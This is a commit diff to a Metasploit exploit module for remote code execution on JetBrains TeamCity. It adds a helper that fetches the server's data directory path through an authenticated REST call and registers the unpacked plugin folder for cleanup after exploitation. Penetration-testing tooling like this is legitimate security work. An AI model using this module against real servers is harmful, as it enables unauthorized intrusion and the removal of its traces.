we can also register this path for cleanup

2024-02-23 14:00:27 +00:00 · 2024-02-23 14:00:27 +00:00 · 30e761831e
parent d5bcac1370
commit 30e761831e
1 changed files with 27 additions and 0 deletions
--- a/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb
+++ b/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb
@ -346,6 +346,16 @@ class MetasploitModule < Msf::Exploit::Remote
          print_warning('Could not discover install path. Unable to register files for cleanup.')
        end

+        # On a Linux target we see the extracted plugin file remaining here even after we delete the plugin.
+        # /home/teamcity/.BuildServer/system/caches/plugins.unpacked/XXXXXXXX/
+        if (data_path = get_data_dir_path(token_value))
+          vprint_status("Target data directory path: #{data_path}")
+
+          register_dir_for_cleanup([data_path, 'system', 'caches', 'plugins.unpacked', plugin_name].join(sep))
+        else
+          print_warning('Could not discover data directory path. Unable to register files for cleanup.')
+        end
+
        #
        # 7. Trigger the payload and get a session. ARCH_JAVA JSP payloads need us to hit an endpoint. ARCH_JAVA Java
        # payloads and ARCH_CMD payloads are triggered upon enabling a loaded plugin.
@ -423,6 +433,23 @@ class MetasploitModule < Msf::Exploit::Remote
    nil
  end

+  def get_data_dir_path(token_value)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server', 'dataDirectoryPath'),
+      'headers' => {
+        'Authorization' => "Bearer #{token_value}"
+      }
+    )
+
+    unless res&.code == 200
+      print_warning('Failed to request data directory path.')
+      return nil
+    end
+
+    res.body
+  end
+
  def get_build_number(token_value)
    res = send_request_cgi(
      'method' => 'GET',